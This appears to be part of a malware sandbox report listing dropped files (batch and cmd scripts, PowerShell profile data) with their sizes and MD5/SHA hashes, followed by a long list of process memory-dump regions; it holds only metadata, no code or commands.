938ffc2cba917b243d86b2cf76dcefb4

SHA1
234b53d91d075f16cc63c731eefdae278e2faad3

SHA256
5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

SHA512
e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
21KB

MD5
99b48d7bbd266f3b9fc07dc54562734d

SHA1
cdf6b6f84e44de8d7fddba84b98c850464c7bc90

SHA256
28a7031b197b1d065469d3994ca22773f27c26b2ebca88501cf5c66e571ef75e

SHA512
50e54a68fdfaf73b11bc782477f54a8df74fefe08f90a8e86dbdc9faaeacb21ca0497f70c83f259cda9458040c05b9c82635ceadd1d895a0fe1ee1e6c0d0de18

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
48ecb93e7b30680f9756f98d3c27ef08

SHA1
c774e16a682a87fbbb0334be957d0a15329d3379

SHA256
eaffbc8234a79d0a3cd277b3e9ee235a00c55e2142b51f2cf7e4158333298eaf

SHA512
59aeaa9eb410a50faf553faddb20c5bf975114e1f1d15194d3fc510460c55099a2595c39a0c60ec36b928a707c5fd3f9902b089803072dda80812659ec6b6d84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
cfad425f4b7023c2aa6a6c55f399e7c0

SHA1
48aafe6c7facd4368f64e8c91479e3431b5dea09

SHA256
76c12648b20b156b29478463adcbd8c69574f6a0b44e01c53e55789397b49350

SHA512
66cfd67b60f5e52eb5386b820b07d87d0d4ad18588e154fe706be89861c74d279478a4b8afd0dd3ae66ae154ccbfbf81677e1a4dcf896cd2ecc5633e1a03aaec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
638ed474d975f0ae597309a485ffa91b

SHA1
667b01f4d4dd0b706358aa0241388f907beb0412

SHA256
1effae93bc815f511e90d38f7730ff6464ea0eaef9f3b855ef2924921a073f32

SHA512
098873b884068a1cf90351e08967b4d990ce2ca05d00b7254a87e370380cbcafbec324cef1ac7e05ac324ee3909ef417e77e363ff1e045df8a7621a8ffa4b6be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
3a4631d86830d626353a8265044a006a

SHA1
b5d478a93eaed15eb4eced666ad8a5e480eabd0c

SHA256
23af51b017610cd22920bcb1d96fec3d8be2743ee1bf7c22dadb8ae793acd711

SHA512
cc0d09d8d08f63a0f32d5d443981fd5e2a854729cfc3ebd0f9235b1a10868dce7c11352d30acc76cb78c60daf0ce74aa3dcb6cbaea636d5d419ac3fd2699e44a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ADE_VWUXQDtZyBdZTGDaQ98p.bat

Filesize
552KB

MD5
728767757f4f30cdae80db8b873da393

SHA1
5cc1a16a9c33e130bd08c07bfe925ea88cc894e8

SHA256
817bf9222bd75073179b5fa19720c5d0b576d6f48fc3f0aa2364ebb9ea7dd517

SHA512
b32558987832a57fd31877eafe7e16cdc96d2b367d24c484b306e2f47b46cfed84233d25498beedf1e15fa6a80edeac410ec789e1a13b2eeafb03e5220073a90

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u3sulnox.w3c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gnviahcnwphcnrspgsv

Filesize
4KB

MD5
9d1c4331e92ea47959e79f26ca09d973

SHA1
f8baa65953243feba3299fbaa7af110fbc7011b2

SHA256
ffddf68859952ecc2a486189ef0b15519f898d4d1ba04f6555264714b2d9108f

SHA512
76cc4cfa6a89d69035c0539294a5903f5b9b01314aaa2ffef7ccc6a5cdc163bf2336fa98e6f5406510b74c8da8bf5cbac5c55718df58f3b082b7fe8f8dda3daf

Download Submit
C:\Users\Admin\AppData\Roaming\Network89398Man.cmd

Filesize
264KB

MD5
194118c43c65faad06bf5ff6cd9b52a2

SHA1
7bdf85b3968747acf21d37df5e56d54f8a0c7e62

SHA256
1a5ad9ae7b0dcdc2edb7e93556f2c59c84f113879df380d95835fb8ea3914ed8

SHA512
42a7d57520d68acfc79972e387cf6a9ca45b1159ee14ba1d6b4bc801d90d38e7eeb6dfd6aa3c039773cceb6d3a9223cc8459abd7661ae162b89644b6db8996b2

Download Submit
memory/540-132-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

Filesize
64KB

Download
memory/540-131-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/540-133-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

Filesize
64KB

Download
memory/540-159-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/540-157-0x0000000007450000-0x0000000007461000-memory.dmp

Filesize
68KB

Download
memory/540-155-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

Filesize
64KB

Download
memory/540-156-0x0000000004BD0000-0x0000000004BE0000-memory.dmp

Filesize
64KB

Download
memory/540-154-0x00000000071B0000-0x0000000007253000-memory.dmp

Filesize
652KB

Download
memory/540-144-0x0000000070470000-0x00000000704BC000-memory.dmp

Filesize
304KB

Download
memory/664-187-0x0000000000400000-0x000000000045D000-memory.dmp

Filesize
372KB

Download
memory/664-186-0x0000000005500000-0x000000000550C000-memory.dmp

Filesize
48KB

Download
memory/664-114-0x0000000002EC0000-0x0000000002ED0000-memory.dmp

Filesize
64KB

Download
memory/664-113-0x0000000002EC0000-0x0000000002ED0000-memory.dmp

Filesize
64KB

Download
memory/664-103-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/2364-258-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2364-262-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2884-260-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/2884-264-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/2884-266-0x0000000000400000-0x0000000000457000-memory.dmp

Filesize
348KB

Download
memory/3576-160-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/3576-161-0x0000000004960000-0x0000000004970000-memory.dmp

Filesize
64KB

Download
memory/3576-172-0x000000007FDA0000-0x000000007FDB0000-memory.dmp

Filesize
64KB

Download
memory/3576-173-0x0000000070470000-0x00000000704BC000-memory.dmp

Filesize
304KB

Download
memory/3576-183-0x0000000004960000-0x0000000004970000-memory.dmp

Filesize
64KB

Download
memory/3576-185-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/3792-263-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3792-274-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3792-272-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4364-116-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4364-117-0x0000000005560000-0x0000000005570000-memory.dmp

Filesize
64KB

Download
memory/4364-130-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4364-127-0x0000000005560000-0x0000000005570000-memory.dmp

Filesize
64KB

Download
memory/4388-37-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4388-23-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4388-24-0x0000000005210000-0x0000000005220000-memory.dmp

Filesize
64KB

Download
memory/4388-25-0x0000000005210000-0x0000000005220000-memory.dmp

Filesize
64KB

Download
memory/4460-74-0x0000000004B80000-0x0000000004B90000-memory.dmp

Filesize
64KB

Download
memory/4460-73-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4460-98-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4460-86-0x0000000070470000-0x00000000704BC000-memory.dmp

Filesize
304KB

Download
memory/4664-279-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/4664-210-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4664-242-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/4768-65-0x0000000007700000-0x00000000077A3000-memory.dmp

Filesize
652KB

Download
memory/4768-67-0x0000000007AE0000-0x0000000007B76000-memory.dmp

Filesize
600KB

Download
memory/4768-68-0x0000000007A50000-0x0000000007A61000-memory.dmp

Filesize
68KB

Download
memory/4768-40-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4768-51-0x000000007F860000-0x000000007F870000-memory.dmp

Filesize
64KB

Download
memory/4768-69-0x0000000002D90000-0x0000000002DA0000-memory.dmp

Filesize
64KB

Download
memory/4768-52-0x00000000076B0000-0x00000000076E2000-memory.dmp

Filesize
200KB

Download
memory/4768-71-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4768-66-0x00000000078C0000-0x00000000078CA000-memory.dmp

Filesize
40KB

Download
memory/4768-41-0x0000000002D90000-0x0000000002DA0000-memory.dmp

Filesize
64KB

Download
memory/4768-53-0x0000000070470000-0x00000000704BC000-memory.dmp

Filesize
304KB

Download
memory/4768-64-0x0000000002D90000-0x0000000002DA0000-memory.dmp

Filesize
64KB

Download
memory/4768-63-0x0000000006AF0000-0x0000000006B0E000-memory.dmp

Filesize
120KB

Download
memory/4944-96-0x0000000002EE0000-0x0000000002EF0000-memory.dmp

Filesize
64KB

Download
memory/4944-11-0x0000000006160000-0x00000000061C6000-memory.dmp

Filesize
408KB

Download
memory/4944-0-0x0000000002E80000-0x0000000002EB6000-memory.dmp

Filesize
216KB

Download
memory/4944-19-0x0000000006BF0000-0x0000000006C34000-memory.dmp

Filesize
272KB

Download
memory/4944-18-0x00000000066D0000-0x000000000671C000-memory.dmp

Filesize
304KB

Download
memory/4944-17-0x00000000066A0000-0x00000000066BE000-memory.dmp

Filesize
120KB

Download
memory/4944-85-0x0000000002EE0000-0x0000000002EF0000-memory.dmp

Filesize
64KB

Download
memory/4944-16-0x00000000061D0000-0x0000000006524000-memory.dmp

Filesize
3.3MB

Download
memory/4944-21-0x0000000008090000-0x000000000870A000-memory.dmp

Filesize
6.5MB

Download
memory/4944-20-0x0000000007990000-0x0000000007A06000-memory.dmp

Filesize
472KB

Download
memory/4944-5-0x0000000005FD0000-0x0000000006036000-memory.dmp

Filesize
408KB

Download
memory/4944-4-0x00000000057B0000-0x00000000057D2000-memory.dmp

Filesize
136KB

Download
memory/4944-3-0x0000000005930000-0x0000000005F58000-memory.dmp

Filesize
6.2MB

Download
memory/4944-72-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4944-2-0x0000000002EE0000-0x0000000002EF0000-memory.dmp

Filesize
64KB

Download
memory/4944-22-0x0000000007A30000-0x0000000007A4A000-memory.dmp

Filesize
104KB

Download
memory/4944-128-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4944-1-0x00000000746D0000-0x0000000074E80000-memory.dmp

Filesize
7.7MB

Download
memory/4944-38-0x0000000007BD0000-0x0000000007C06000-memory.dmp

Filesize
216KB

Download